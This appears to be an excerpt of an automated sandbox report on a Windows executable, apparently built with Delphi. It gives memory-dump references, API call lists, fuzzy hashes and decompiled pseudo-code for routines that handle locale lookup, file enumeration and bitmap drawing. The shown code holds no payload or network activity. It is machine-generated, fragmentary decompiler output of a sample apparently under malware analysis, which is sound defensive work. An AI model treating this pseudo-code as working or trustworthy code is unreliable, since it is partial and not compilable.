                                                                                                                          • API ID: FileFind$FirstNext
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1690352074-0
                                                                                                                          • Opcode ID: 4f493d9307b3d4b817a7e836544abeb962cbb198da26cb643227803e88156b29
                                                                                                                          • Instruction ID: b59b8e1bf290491f0b5bd01f3f1f1884d5f58955f35eb0aac9512fedb03d6d3a
                                                                                                                          • Opcode Fuzzy Hash: 4f493d9307b3d4b817a7e836544abeb962cbb198da26cb643227803e88156b29
                                                                                                                          • Instruction Fuzzy Hash: 70D0A76230111417870065BF2C84C2BF3CDCBCD565391413AB208D7341DD35AC0742B8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 37%
                                                                                                                          			E00402448(void* __eax) {
                                                                                                                          				void* _t3;
                                                                                                                          				void* _t6;
                                                                                                                          
                                                                                                                          				if(__eax <= 0) {
                                                                                                                          					_t6 = 0;
                                                                                                                          				} else {
                                                                                                                          					_t3 =  *0x409030(); // executed
                                                                                                                          					_t6 = _t3;
                                                                                                                          					if(_t6 == 0) {
                                                                                                                          						E00402530(1);
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _t6;
                                                                                                                          			}






                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8dfeac06a829af607fe89a8817dc8f9230199d36438cef303ac21605a03e7c3b
                                                                                                                          • Instruction ID: d53205a698bee5913c9905fe3b2fa7a5b2040cee35667c8cc0b5dc0e3ef69e66
                                                                                                                          • Opcode Fuzzy Hash: 8dfeac06a829af607fe89a8817dc8f9230199d36438cef303ac21605a03e7c3b
                                                                                                                          • Instruction Fuzzy Hash: 6AC08C6030270387DB202AFA1FDC113125C3F24205300403BA901F13D3EAF8CD089A2F
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00406510(void* __eax, void* __edx) {
                                                                                                                          				void* _t3;
                                                                                                                          				void* _t4;
                                                                                                                          				void* _t8;
                                                                                                                          				void* _t9;
                                                                                                                          				intOrPtr* _t10;
                                                                                                                          
                                                                                                                          				_t3 = E00406B48(_t10, _t4, __edx, 0, _t8, _t9); // executed
                                                                                                                          				return _t3;
                                                                                                                          			}









                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: IconInfo
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2096194817-0
                                                                                                                          • Opcode ID: 3aa0d1c17f7541c88f4a23eede43810dced38d8a94ff8caad404287aac718eb2
                                                                                                                          • Instruction ID: 2c83cf8f1268621ffc1ea80895ab672af1bae2362a1aae74aa6b220125402c61
                                                                                                                          • Opcode Fuzzy Hash: 3aa0d1c17f7541c88f4a23eede43810dced38d8a94ff8caad404287aac718eb2
                                                                                                                          • Instruction Fuzzy Hash: 92A002C6751214079B4CE53F1C6292A729F07C8615759C87A7906DA289CD38E8512155
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040C2A0: GetKeyboardType.USER32 ref: 0040C2A5
                                                                                                                            • Part of subcall function 0040C2A0: GetKeyboardType.USER32 ref: 0040C2B1
                                                                                                                          • GetCommandLineA.KERNEL32 ref: 0040D87B
                                                                                                                          • GetVersion.KERNEL32 ref: 0040D88F
                                                                                                                          • GetVersion.KERNEL32 ref: 0040D8A0
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0040D8DC
                                                                                                                            • Part of subcall function 0040C2D0: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C2F2
                                                                                                                            • Part of subcall function 0040C2D0: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C325
                                                                                                                            • Part of subcall function 0040C2D0: RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C33B
                                                                                                                          • GetThreadLocale.KERNEL32 ref: 0040D8BC
                                                                                                                            • Part of subcall function 0040D74C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00403D1A), ref: 0040D772
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3734044017-0
                                                                                                                          • Opcode ID: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
                                                                                                                          • Instruction ID: 917de0a484455ad82c20158439a2a24f06621c5804a29fc775aa2cf17b207d74
                                                                                                                          • Opcode Fuzzy Hash: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
                                                                                                                          • Instruction Fuzzy Hash: F10129B1C113449AE711BFB1AA463193A60AB1130CF10857FD151762E2EB7D00A8DB6F
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000), ref: 0040F16D
                                                                                                                          • FindNextFileA.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 0040F1CF
                                                                                                                          • FindClose.KERNEL32(00000000,00000000,?,?,?,00000000,00000000), ref: 0040F1D9
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                          • String ID: *.*
                                                                                                                          • API String ID: 3541575487-438819550
                                                                                                                          • Opcode ID: 1eb9b05f6550193698417fdfd1abd8b4f720dd67f104cddbbfc16bbf0ec42b4c
                                                                                                                          • Instruction ID: 21f552544a71644aa5a29d04448db43bc273ae507e021618840bae1d7485b843
                                                                                                                          • Opcode Fuzzy Hash: 1eb9b05f6550193698417fdfd1abd8b4f720dd67f104cddbbfc16bbf0ec42b4c
                                                                                                                          • Instruction Fuzzy Hash: C431B071704100ABDB15AB66D88286B37A9DF86328720457FF804EF6C7DA7CDC1A8699
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000), ref: 0040F16D
                                                                                                                          • FindNextFileA.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 0040F1CF
                                                                                                                          • FindClose.KERNEL32(00000000,00000000,?,?,?,00000000,00000000), ref: 0040F1D9
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                          • String ID: *.*
                                                                                                                          • API String ID: 3541575487-438819550
                                                                                                                          • Opcode ID: ca5e68894038c338b17cd596c0991537003cad852163082c19a1be6d7e7f9c81
                                                                                                                          • Instruction ID: 271996e333eb2d0f8e3e23676571f4307960fb9fe6b8e39aca4bbd563d4a420a
                                                                                                                          • Opcode Fuzzy Hash: ca5e68894038c338b17cd596c0991537003cad852163082c19a1be6d7e7f9c81
                                                                                                                          • Instruction Fuzzy Hash: 1031C171700100ABDB14EF67D88286B369ADF85328720457FF804EF6C7EA7CDC0A8699
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,Function_000051DB), ref: 0040EBD3
                                                                                                                          • FindNextFileA.KERNEL32(00000000,00000010), ref: 0040EC33
                                                                                                                          • FindClose.KERNEL32(00000000,00000000,00000010), ref: 0040EC43
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3541575487-0
                                                                                                                          • Opcode ID: 4092cce72e1492469b29ed450f25109bd7218eb8d29261f7a9cbb69d7287a135
                                                                                                                          • Instruction ID: c0991531ddac9e0079019e73ada339c648f4459b5552238d600e3526c74abf5e
                                                                                                                          • Opcode Fuzzy Hash: 4092cce72e1492469b29ed450f25109bd7218eb8d29261f7a9cbb69d7287a135
                                                                                                                          • Instruction Fuzzy Hash: 24412C30904618DBDB21EBA6C885BDEB7B5EF48308F5045FAA404B7291D73CAE45DE58
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000), ref: 0040F16D
                                                                                                                          • FindNextFileA.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 0040F1CF
                                                                                                                          • FindClose.KERNEL32(00000000,00000000,?,?,?,00000000,00000000), ref: 0040F1D9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3541575487-0
                                                                                                                          • Opcode ID: f55870f158cee9a1d6f18cde8792f83b73ebd952d8db967ab993b5bc452fad5b
                                                                                                                          • Instruction ID: daf054dd685538e10cf0cfb88bdb67cc68ef1b402af78a2ce0ba985ddb15a516
                                                                                                                          • Opcode Fuzzy Hash: f55870f158cee9a1d6f18cde8792f83b73ebd952d8db967ab993b5bc452fad5b
                                                                                                                          • Instruction Fuzzy Hash: 44119371704100ABDA15AB27DC8296B365ADFC5364B10493FF809EF2C6DA3DDC0A8699
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,Function_000051DB), ref: 0040EBD3
                                                                                                                          • FindNextFileA.KERNEL32(00000000,00000010), ref: 0040EC33
                                                                                                                          • FindClose.KERNEL32(00000000,00000000,00000010), ref: 0040EC43
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3541575487-0
                                                                                                                          • Opcode ID: 48372c018bd84101f49dc516bbf45a6ced4abc977314169db57e5ea29c748e96
                                                                                                                          • Instruction ID: 9a129490767a9822db482bfa393921b2fcf1aa7a937d9a2231ce8cb683432473
                                                                                                                          • Opcode Fuzzy Hash: 48372c018bd84101f49dc516bbf45a6ced4abc977314169db57e5ea29c748e96
                                                                                                                          • Instruction Fuzzy Hash: 9A310C30D04608EFDB11EBA6C886A9EB7B5EF48304F5045FAA405B73D1D778AF45CA58
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNEL32(?), ref: 0040EA0C
                                                                                                                          • FindClose.KERNEL32(00000000,?), ref: 0040EA16
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2295610775-0
                                                                                                                          • Opcode ID: 02548c725d9e45131fd1c362ffdfc86aac1187def22e8373c54bf7181a1369e7
                                                                                                                          • Instruction ID: 6a2226afb0a8b14f7d31ab3cf4cdd30a4af029b65c76461fbe821aedbeee1211
                                                                                                                          • Opcode Fuzzy Hash: 02548c725d9e45131fd1c362ffdfc86aac1187def22e8373c54bf7181a1369e7
                                                                                                                          • Instruction Fuzzy Hash: 78C08C64E081402BC80023B6CC0282B3008FA84348F840926759BF22C2D93E89248A6E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 51%
                                                                                                                          			E00403CB4(int __eax, void* __ebx, void* __eflags) {
                                                                                                                          				char _v8;
                                                                                                                          				char _v15;
                                                                                                                          				char _v20;
                                                                                                                          				intOrPtr _t29;
                                                                                                                          				void* _t32;
                                                                                                                          
                                                                                                                          				_v20 = 0;
                                                                                                                          				_push(_t32);
                                                                                                                          				_push(0x403d1a);
                                                                                                                          				_push( *[fs:edx]);
                                                                                                                          				 *[fs:edx] = _t32 + 0xfffffff0;
                                                                                                                          				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
                                                                                                                          				E004031F4( &_v20, 7,  &_v15);
                                                                                                                          				E0040269C(_v20,  &_v8);
                                                                                                                          				if(_v8 != 0) {
                                                                                                                          				}
                                                                                                                          				_pop(_t29);
                                                                                                                          				 *[fs:eax] = _t29;
                                                                                                                          				_push(E00403D21);
                                                                                                                          				return E00403094( &_v20);
                                                                                                                          			}









                                                                                                                          APIs
                                                                                                                          • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00403D1A), ref: 00403CDA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: InfoLocale
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2299586839-0
                                                                                                                          • Opcode ID: f7943df5f697ff604979ede478dc829ce2ae39317294e6d377f4d43c8f2bc4e7
                                                                                                                          • Instruction ID: 6d3425cb13dc4e10e5c99e835ecbf0d9b5a709cf75aacf138b47c3a7ed30a7d1
                                                                                                                          • Opcode Fuzzy Hash: f7943df5f697ff604979ede478dc829ce2ae39317294e6d377f4d43c8f2bc4e7
                                                                                                                          • Instruction Fuzzy Hash: DDF0C830904209AFEB04DFA2CC42ADEF77EFB88714F10887AA110675C0EBB82B04C648
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00403D1A), ref: 0040D772
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: InfoLocale
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2299586839-0
                                                                                                                          • Opcode ID: 226d36a3a2a6d126d7b518791991f6729a36aae8a22c2ca38394135d70b07227
                                                                                                                          • Instruction ID: 7765dcfaf0ac3467b05695104e180fa3b916594c574afae56f7b81e2f936b299
                                                                                                                          • Opcode Fuzzy Hash: 226d36a3a2a6d126d7b518791991f6729a36aae8a22c2ca38394135d70b07227
                                                                                                                          • Instruction Fuzzy Hash: F4F06D31A04309EFEB15DFA1CC51ADEF779FB84714F508576A510675C1D7B82604C758
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LocalTime
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 481472006-0
                                                                                                                          • Opcode ID: 7c7103a78b60b1e57ed44af7b7ea6f275b95f35198deba2e3da0b3ebacb4dc04
                                                                                                                          • Instruction ID: 4be9079c8441ee73391fb420eaf64c5b500e0d105d5474b8364197a0399cc555
                                                                                                                          • Opcode Fuzzy Hash: 7c7103a78b60b1e57ed44af7b7ea6f275b95f35198deba2e3da0b3ebacb4dc04
                                                                                                                          • Instruction Fuzzy Hash: 23C08C3980450652C600BB64DC0284AB6A8AEC0200F8089BEA4CCD21E1EB39D31DC3C7
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 46%
                                                                                                                          			E0040627C(void* __eax, void* __ebp, void* __eflags) {
                                                                                                                          				struct HDC__* _v8;
                                                                                                                          				intOrPtr _v12;
                                                                                                                          				intOrPtr _v36;
                                                                                                                          				intOrPtr _v40;
                                                                                                                          				struct HDC__* _v44;
                                                                                                                          				struct HDC__* _v60;
                                                                                                                          				struct HDC__* _v68;
                                                                                                                          				struct HDC__* _v72;
                                                                                                                          				void* _t59;
                                                                                                                          				struct HBITMAP__* _t62;
                                                                                                                          				void* _t68;
                                                                                                                          				void* _t71;
                                                                                                                          				int _t72;
                                                                                                                          				int _t75;
                                                                                                                          				int _t80;
                                                                                                                          				void* _t81;
                                                                                                                          				void* _t85;
                                                                                                                          				void* _t94;
                                                                                                                          				void* _t100;
                                                                                                                          				void* _t114;
                                                                                                                          				struct HDC__* _t116;
                                                                                                                          				struct HDC__* _t119;
                                                                                                                          				signed int _t121;
                                                                                                                          				struct HBITMAP__* _t124;
                                                                                                                          				struct HBITMAP__* _t125;
                                                                                                                          				RECT* _t126;
                                                                                                                          				void* _t128;
                                                                                                                          
                                                                                                                          				_t128 = __eflags;
                                                                                                                          				_push(__eax);
                                                                                                                          				E00406144(__eax);
                                                                                                                          				_pop(_t59);
                                                                                                                          				if(_t128 != 0) {
                                                                                                                          					asm("pushad");
                                                                                                                          					_t100 = _t59;
                                                                                                                          					 *((intOrPtr*)(_t100 + 0x34))();
                                                                                                                          					 *((intOrPtr*)(_t100 + 0x28)) = 0;
                                                                                                                          					 *((intOrPtr*)(_t100 + 0x56)) = 0;
                                                                                                                          					 *((intOrPtr*)(_t100 + 0x5a)) = 0;
                                                                                                                          					asm("jecxz 0x13");
                                                                                                                          					_t62 =  *(_t100 + 0x3d);
                                                                                                                          					_t121 =  *(_t62 + 4);
                                                                                                                          					_t119 =  *(_t62 + 8);
                                                                                                                          					if(_t119 < 0) {
                                                                                                                          						_t119 =  ~_t119;
                                                                                                                          					}
                                                                                                                          					_push(0);
                                                                                                                          					L00404108();
                                                                                                                          					_push(_t62);
                                                                                                                          					_t130 =  *((char*)(_t100 + 0x3c)) - 1;
                                                                                                                          					if( *((char*)(_t100 + 0x3c)) != 1) {
                                                                                                                          						asm("jecxz 0xfffffff2");
                                                                                                                          						_t124 = 0;
                                                                                                                          						_t110 =  *(_t100 + 0x18);
                                                                                                                          						_push(E00405F70( *((intOrPtr*)(_t100 + 0x1c)),  *((intOrPtr*)(( *(_t100 + 0x49) & 0x000000ff) + 0x409188)),  *(_t100 + 0x18)));
                                                                                                                          						__eflags =  *(_t100 + 0x49) - 5;
                                                                                                                          						if( *(_t100 + 0x49) == 5) {
                                                                                                                          							E0040600C(_t67, _t110);
                                                                                                                          						}
                                                                                                                          						_pop(_t68);
                                                                                                                          						_push(_t68);
                                                                                                                          						_push(E00406268(_t68) *  *(_t100 + 0x18));
                                                                                                                          						_t71 = E00402448(E00406268(_t68) *  *(_t100 + 0x18));
                                                                                                                          						_push(_t71);
                                                                                                                          						_push(0);
                                                                                                                          						_push(_v12);
                                                                                                                          						_push(_t71);
                                                                                                                          						_t72 =  *(_t100 + 0x18);
                                                                                                                          						__eflags = _t72 - _t119;
                                                                                                                          						if(__eflags > 0) {
                                                                                                                          							_t72 = _t119;
                                                                                                                          						}
                                                                                                                          						_t75 = GetDIBits(_v8, E00406154(_t100, __eflags), 0, _t72, ??, ??, ??);
                                                                                                                          						_t113 =  *(_t100 + 0x18);
                                                                                                                          						__eflags = _t113 - _t119;
                                                                                                                          						if(_t113 > _t119) {
                                                                                                                          							_t113 = _t119;
                                                                                                                          						}
                                                                                                                          						__eflags = _t75 - _t113;
                                                                                                                          						if(__eflags != 0) {
                                                                                                                          							_pop(_t81);
                                                                                                                          							E00402468(_t81);
                                                                                                                          							_push(0);
                                                                                                                          							_push(0);
                                                                                                                          							_push(0);
                                                                                                                          							_push(_t126);
                                                                                                                          							_push(0);
                                                                                                                          							_push(_v40);
                                                                                                                          							_push(_v36);
                                                                                                                          							L00404110();
                                                                                                                          							_t121 = _t121 ^ 0xffffffff;
                                                                                                                          							_t124 = 0;
                                                                                                                          							_t85 = SelectObject(_v60, 0);
                                                                                                                          							_t113 = _v68;
                                                                                                                          							__eflags = 0;
                                                                                                                          							E00406094(_t100, 0, _v68, 0, 0);
                                                                                                                          							SelectObject(_v72, _t85);
                                                                                                                          						}
                                                                                                                          						E00406024(_t100, _t100, _t113, __eflags);
                                                                                                                          						_pop( *_t47);
                                                                                                                          						_pop( *_t48);
                                                                                                                          						_pop( *_t49);
                                                                                                                          						 *(_t100 + 0x20) = _t124;
                                                                                                                          						__eflags = _t121;
                                                                                                                          						 *(_t100 + 0x72) = 0;
                                                                                                                          						if(_t121 < 0) {
                                                                                                                          							_t52 = _t100 + 0x72;
                                                                                                                          							 *_t52 =  *(_t100 + 0x72) + 1;
                                                                                                                          							__eflags =  *_t52;
                                                                                                                          						}
                                                                                                                          					} else {
                                                                                                                          						_push(0);
                                                                                                                          						L00404178();
                                                                                                                          						_push(_t62);
                                                                                                                          						_push( *(_t100 + 0x18));
                                                                                                                          						_push( *((intOrPtr*)(_t100 + 0x1c)));
                                                                                                                          						_push(_t62);
                                                                                                                          						L00404100();
                                                                                                                          						_t125 = _t62;
                                                                                                                          						L00404190();
                                                                                                                          						_t116 = 0;
                                                                                                                          						_push(_t116);
                                                                                                                          						_push(SelectObject(_t116, _t125));
                                                                                                                          						_push( *(_t100 + 0x18));
                                                                                                                          						_push( *((intOrPtr*)(_t100 + 0x1c)));
                                                                                                                          						_push(0);
                                                                                                                          						_t94 = CreateSolidBrush(E0040469C( *((intOrPtr*)(_t100 + 0x2c))));
                                                                                                                          						_t117 = _t126;
                                                                                                                          						FillRect(_v44, _t126, _t94);
                                                                                                                          						DeleteObject(_t94);
                                                                                                                          						asm("jecxz 0x24");
                                                                                                                          						SelectObject(_v60, 0);
                                                                                                                          						SetDIBits(_v68, _t125, 0,  *(_t100 + 0x18),  *(_t100 + 0x41),  *(_t100 + 0x3d), 0);
                                                                                                                          						E00406024(_t100, _t100, _t117, _t130);
                                                                                                                          						 *(_t100 + 0x20) = _t125;
                                                                                                                          					}
                                                                                                                          					asm("jecxz 0xa");
                                                                                                                          					_pop(_t114);
                                                                                                                          					 *((intOrPtr*)( *((intOrPtr*)(_t100 + 0x4a))))(_t114);
                                                                                                                          					_t80 = DeleteDC(_t119);
                                                                                                                          					asm("popad");
                                                                                                                          					return _t80;
                                                                                                                          				}
                                                                                                                          				return _t59;
                                                                                                                          			}






























                                                                                                                          0x0040640b
                                                                                                                          0x0040640f
                                                                                                                          0x00406414
                                                                                                                          0x00406417
                                                                                                                          0x0040641d
                                                                                                                          0x00406423
                                                                                                                          0x00406427
                                                                                                                          0x0040642c
                                                                                                                          0x00406435
                                                                                                                          0x00406435
                                                                                                                          0x0040643c
                                                                                                                          0x00406441
                                                                                                                          0x00406444
                                                                                                                          0x00406447
                                                                                                                          0x0040644a
                                                                                                                          0x0040644d
                                                                                                                          0x0040644f
                                                                                                                          0x00406453
                                                                                                                          0x00406455
                                                                                                                          0x00406455
                                                                                                                          0x00406455
                                                                                                                          0x00406455
                                                                                                                          0x004062e7
                                                                                                                          0x004062e7
                                                                                                                          0x004062e9
                                                                                                                          0x004062ee
                                                                                                                          0x004062ef
                                                                                                                          0x004062f2
                                                                                                                          0x004062f5
                                                                                                                          0x004062f6
                                                                                                                          0x004062fb
                                                                                                                          0x004062fe
                                                                                                                          0x00406303
                                                                                                                          0x00406304
                                                                                                                          0x0040630c
                                                                                                                          0x0040630d
                                                                                                                          0x00406310
                                                                                                                          0x00406313
                                                                                                                          0x00406320
                                                                                                                          0x00406325
                                                                                                                          0x0040632e
                                                                                                                          0x00406333
                                                                                                                          0x0040633e
                                                                                                                          0x00406344
                                                                                                                          0x0040635b
                                                                                                                          0x00406378
                                                                                                                          0x0040637d
                                                                                                                          0x0040637d
                                                                                                                          0x0040645b
                                                                                                                          0x0040645d
                                                                                                                          0x00406463
                                                                                                                          0x00406465
                                                                                                                          0x0040646a
                                                                                                                          0x00000000
                                                                                                                          0x0040646a
                                                                                                                          0x0040646b

                                                                                                                          APIs
                                                                                                                          • GetObjectA.GDI32(?,00000018), ref: 004062C2
                                                                                                                          • 73BBA590.GDI32(00000000,?,00000000,?,00000000), ref: 004062D7
                                                                                                                          • 73BBAC50.USER32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,?), ref: 004062E9
                                                                                                                          • 73BBA520.GDI32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004062F6
                                                                                                                          • 73BBB380.USER32(00000000,00000000,?,?,00000000,00000000), ref: 004062FE
                                                                                                                          • SelectObject.GDI32(00000000), ref: 00406307
                                                                                                                          • CreateSolidBrush.GDI32(00000000), ref: 00406320
                                                                                                                          • FillRect.USER32 ref: 0040632E
                                                                                                                          • DeleteObject.GDI32(?), ref: 00406333
                                                                                                                          • SelectObject.GDI32(?), ref: 00406344
                                                                                                                          • SetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0040635B
                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00406371
                                                                                                                          • GetDIBits.GDI32(?,00000000,00000000,?,00000000,?,00000000), ref: 004063E4
                                                                                                                          • 73BBA7A0.GDI32(?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 0040640F
